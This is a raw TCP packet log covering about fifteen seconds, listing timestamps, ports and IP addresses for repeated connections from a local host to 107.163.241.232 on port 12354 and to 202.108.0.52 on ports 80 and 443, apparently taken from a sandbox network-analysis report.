Dec 11, 2024 16:29:01.549052000 CET	60992	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.549063921 CET	12354	60698	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.549314976 CET	12354	60698	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.549335003 CET	12354	60939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.549422026 CET	60939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.549890041 CET	60939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.657329082 CET	80	60922	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.657495975 CET	60922	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.657720089 CET	60922	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.661591053 CET	80	60922	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.667604923 CET	12354	60797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.667867899 CET	12354	60797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.668472052 CET	12354	60992	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.668565989 CET	60992	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.668992996 CET	60992	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.669260979 CET	12354	60939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.669270992 CET	12354	60939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.669328928 CET	60939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.669755936 CET	60939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.671340942 CET	61156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.776920080 CET	80	60922	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.776931047 CET	80	60922	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.778575897 CET	61293	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.788438082 CET	12354	60992	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.788526058 CET	60992	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.788656950 CET	12354	60992	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.789046049 CET	12354	60939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.789114952 CET	12354	60939	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.790985107 CET	12354	61156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.791300058 CET	60992	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.791346073 CET	61156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.791644096 CET	61306	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.794320107 CET	61156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.897828102 CET	80	61293	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.897895098 CET	61293	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.898473024 CET	61293	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.907891035 CET	12354	60992	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.910825014 CET	12354	60992	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.911149025 CET	12354	61156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.911170959 CET	12354	61306	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.911241055 CET	61306	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.911339045 CET	61156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.913929939 CET	12354	61156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.914674044 CET	61156	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.915230989 CET	61400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.915347099 CET	61306	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.018146992 CET	80	61293	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:02.031789064 CET	12354	61156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.034776926 CET	12354	61156	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.035099983 CET	12354	61400	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.035185099 CET	61400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.035295963 CET	12354	61306	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.035806894 CET	61400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.154928923 CET	12354	61400	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.155005932 CET	61400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.155127048 CET	12354	61400	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.173146963 CET	61400	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.173588991 CET	61625	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.274323940 CET	12354	61400	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.292805910 CET	12354	61400	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.293327093 CET	12354	61625	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.293404102 CET	61625	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.293776989 CET	61625	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.413018942 CET	12354	61625	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.413084030 CET	61625	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.413096905 CET	12354	61625	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.413846016 CET	61625	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.414745092 CET	61799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.532438040 CET	12354	61625	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.533359051 CET	12354	61625	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.534424067 CET	12354	61799	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:02.534533978 CET	61799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.536488056 CET	61799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:02.655842066 CET	12354	61799	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:03.506150961 CET	80	61293	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:03.506234884 CET	61293	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:03.512547016 CET	62755	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:03.512586117 CET	443	62755	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:03.512723923 CET	62755	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:03.513556957 CET	62755	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:03.513569117 CET	443	62755	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:04.049360991 CET	12354	61306	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.049438000 CET	61306	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.049601078 CET	61306	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.050013065 CET	63221	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.168864012 CET	12354	61306	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.169281006 CET	12354	63221	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.169792891 CET	63221	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.171463966 CET	63221	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.290900946 CET	12354	63221	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.660191059 CET	12354	61799	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.660250902 CET	61799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.672847986 CET	61799	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.673284054 CET	63221	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.673291922 CET	63465	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.673321009 CET	62755	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:04.796159029 CET	12354	61799	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.796171904 CET	12354	63465	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.796284914 CET	63465	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.804064035 CET	63465	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.804600000 CET	63468	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.821867943 CET	61293	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:04.822221994 CET	63493	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:04.923432112 CET	12354	63465	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.923857927 CET	12354	63468	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:04.923963070 CET	63468	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.931612968 CET	63468	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:04.941488981 CET	80	61293	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:04.941502094 CET	80	63493	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:04.941564083 CET	61293	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:04.941591978 CET	63493	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:04.945432901 CET	63493	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:05.044389963 CET	12354	63468	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.044450045 CET	63468	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.045016050 CET	63468	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.045375109 CET	63653	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.052202940 CET	12354	63468	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.066498995 CET	80	63493	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:05.165780067 CET	12354	63468	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.165994883 CET	12354	63468	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.166306019 CET	12354	63653	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.166405916 CET	63653	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.167346001 CET	63653	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.285914898 CET	12354	63653	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.286308050 CET	63653	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.286850929 CET	12354	63653	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.298640966 CET	63653	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.299487114 CET	63891	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.405638933 CET	12354	63653	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.418795109 CET	12354	63653	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.418826103 CET	12354	63891	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.418895960 CET	63891	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.419682980 CET	63891	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.539997101 CET	12354	63891	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.540096045 CET	63891	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.540755033 CET	63891	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.541028023 CET	12354	63891	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.541569948 CET	64121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.662780046 CET	12354	63891	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.664187908 CET	12354	63891	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.664272070 CET	12354	64121	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:05.664423943 CET	64121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.673170090 CET	64121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:05.792802095 CET	12354	64121	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:06.503320932 CET	80	63493	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:06.503437042 CET	63493	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:06.561356068 CET	65033	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:06.561391115 CET	443	65033	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:06.561450005 CET	65033	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:06.562163115 CET	65033	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:06.562175989 CET	443	65033	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:06.911993980 CET	12354	63465	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:06.912087917 CET	63465	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:06.912575960 CET	63465	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:06.912919998 CET	65244	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:07.032486916 CET	12354	63465	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:07.032915115 CET	12354	65244	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:07.033024073 CET	65244	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:07.033358097 CET	65244	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:07.152673006 CET	12354	65244	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:07.786001921 CET	12354	64121	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:07.786093950 CET	64121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:07.786618948 CET	64121	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:07.786962986 CET	49614	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:07.917082071 CET	12354	64121	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:07.917093992 CET	12354	49614	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:07.917195082 CET	49614	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:07.918013096 CET	49614	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:08.037437916 CET	12354	49614	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:08.249444008 CET	443	65033	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.249660969 CET	65033	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.250308990 CET	443	65033	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.251332045 CET	65033	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.253956079 CET	65033	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.254043102 CET	443	65033	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.254220963 CET	65033	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.254221916 CET	443	65033	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.254283905 CET	65033	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.403336048 CET	63493	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.403583050 CET	50106	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.528723955 CET	80	50106	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.528852940 CET	50106	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.529100895 CET	80	63493	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.529123068 CET	50106	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.529166937 CET	63493	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.695595026 CET	80	50106	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.696707010 CET	80	50106	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.819310904 CET	49614	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:08.819494963 CET	65244	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:08.820756912 CET	50623	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:08.866815090 CET	50655	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.942065954 CET	12354	50623	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:08.942203999 CET	50623	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:08.942682028 CET	50623	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:08.989039898 CET	80	50655	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:08.989137888 CET	50655	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:08.989358902 CET	50655	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:09.004128933 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.062293053 CET	12354	50623	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.064625025 CET	12354	50623	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.065551043 CET	50896	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.111108065 CET	80	50655	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:09.111119986 CET	80	50655	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:09.125438929 CET	12354	50853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.125571966 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.125929117 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.186877966 CET	12354	50896	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.187860012 CET	50896	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.188221931 CET	50896	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.229072094 CET	51141	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:09.245465994 CET	12354	50853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.309820890 CET	12354	50896	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.309834957 CET	12354	50896	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.310620070 CET	51256	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.353596926 CET	80	51141	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:09.353717089 CET	51141	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:09.354480982 CET	51141	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:09.432799101 CET	12354	51256	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.432863951 CET	51256	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.435327053 CET	51256	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.478022099 CET	80	51141	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:09.552757978 CET	12354	51256	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.552814007 CET	51256	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.555360079 CET	12354	51256	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.556255102 CET	51256	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.556780100 CET	51370	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.675369978 CET	12354	51256	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.679250002 CET	12354	51256	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.679501057 CET	12354	51370	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:09.679569960 CET	51370	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.680010080 CET	51370	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:09.949754000 CET	12354	51370	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:10.919158936 CET	80	51141	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:10.919245958 CET	51141	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:10.983783007 CET	52867	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:10.983828068 CET	443	52867	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:10.984081030 CET	52867	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:10.984684944 CET	52867	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:10.984694958 CET	443	52867	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:11.238943100 CET	12354	50853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:11.239027023 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:11.239950895 CET	50853	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:11.240242958 CET	53048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:11.359993935 CET	12354	50853	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:11.362046003 CET	12354	53048	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:11.362313032 CET	53048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:11.362569094 CET	53048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:11.483645916 CET	12354	53048	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:11.942253113 CET	12354	51370	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:11.942306995 CET	51370	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:11.942478895 CET	51370	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:11.942981005 CET	53658	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.062143087 CET	12354	51370	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:12.062776089 CET	12354	53658	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:12.062907934 CET	53658	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.065069914 CET	53658	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.184458017 CET	12354	53658	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:12.691178083 CET	443	52867	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:12.691302061 CET	52867	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.691953897 CET	443	52867	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:12.692076921 CET	52867	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.695831060 CET	52867	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.695878983 CET	443	52867	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:12.696007967 CET	443	52867	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:12.696012020 CET	52867	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.696180105 CET	52867	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.828788042 CET	53048	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.829086065 CET	53658	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.831873894 CET	54598	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.832598925 CET	51141	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.832948923 CET	54599	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.949466944 CET	54765	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.951369047 CET	12354	54598	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:12.951455116 CET	54598	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.951584101 CET	54598	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:12.952152967 CET	80	51141	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:12.952394962 CET	51141	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.952676058 CET	80	54599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:12.952944994 CET	54599	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:12.953291893 CET	54599	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:13.069520950 CET	12354	54765	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.069592953 CET	54765	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.069817066 CET	54765	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.071275949 CET	12354	54598	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.071353912 CET	12354	54598	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.071942091 CET	54937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.074867010 CET	80	54599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:13.190031052 CET	12354	54765	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.190198898 CET	54765	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.190875053 CET	12354	54765	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.191581964 CET	12354	54937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.191653967 CET	54937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.201951981 CET	54765	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.202805042 CET	54937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.206599951 CET	55059	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.309470892 CET	12354	54765	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.311372995 CET	12354	54937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.311431885 CET	54937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.311743975 CET	54937	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.312457085 CET	55060	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.321538925 CET	12354	54765	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.322233915 CET	12354	54937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.325979948 CET	12354	55059	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.326045990 CET	55059	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.326255083 CET	55059	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.430824041 CET	12354	54937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.431102991 CET	12354	54937	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.431943893 CET	12354	55060	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.432024956 CET	55060	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.432183981 CET	55060	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:13.445965052 CET	12354	55059	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:13.551460028 CET	12354	55060	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:14.525862932 CET	80	54599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:14.525935888 CET	54599	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:14.551341057 CET	56226	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:14.551374912 CET	443	56226	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:14.551515102 CET	56226	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:14.552598953 CET	56226	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:14.552619934 CET	443	56226	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:14.796446085 CET	443	56226	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:14.797583103 CET	56556	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:14.797614098 CET	443	56556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:14.798038006 CET	56556	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:14.798038006 CET	56556	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:14.798067093 CET	443	56556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:15.441807032 CET	12354	55059	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.441867113 CET	55059	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.456484079 CET	55059	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.456981897 CET	56681	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.577696085 CET	12354	55059	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.578351974 CET	12354	56681	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.578510046 CET	56681	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.598160982 CET	12354	55060	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.598440886 CET	55060	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.627243996 CET	56681	12354	192.168.2.7	107.163.241.232
